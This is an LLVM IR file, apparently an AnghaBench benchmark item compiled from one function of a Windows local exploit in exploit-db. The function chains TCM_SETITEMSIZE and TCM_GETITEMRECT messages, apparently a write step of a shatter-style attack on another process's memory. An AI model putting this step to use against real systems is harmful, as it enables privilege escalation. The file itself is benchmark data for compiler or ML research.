; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_21688.c_doWrite.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_21688.c_doWrite.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@TCM_SETITEMSIZE = common dso_local global i64 0, align 8
@TCM_GETITEMRECT = common dso_local global i64 0, align 8

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @doWrite(i32 %0, i64 %1, i64 %2) #0 {
  %4 = alloca i32, align 4
  %5 = alloca i64, align 8
  %6 = alloca i64, align 8
  store i32 %0, i32* %4, align 4
  store i64 %1, i64* %5, align 8
  store i64 %2, i64* %6, align 8
  %7 = load i32, i32* %4, align 4
  %8 = load i64, i64* @TCM_SETITEMSIZE, align 8
  %9 = trunc i64 %8 to i32
  %10 = load i64, i64* %5, align 8
  %11 = sub nsw i64 %10, 2
  %12 = call i64 @MAKELPARAM(i64 %11, i32 20)
  %13 = call i32 @SendMessage(i32 %7, i32 %9, i32 0, i64 %12)
  %14 = load i32, i32* %4, align 4
  %15 = load i64, i64* @TCM_GETITEMRECT, align 8
  %16 = trunc i64 %15 to i32
  %17 = load i64, i64* %6, align 8
  %18 = call i32 @SendMessage(i32 %14, i32 %16, i32 1, i64 %17)
  ret void
}

declare dso_local i32 @SendMessage(i32, i32, i32, i64) #1

declare dso_local i64 @MAKELPARAM(i64, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
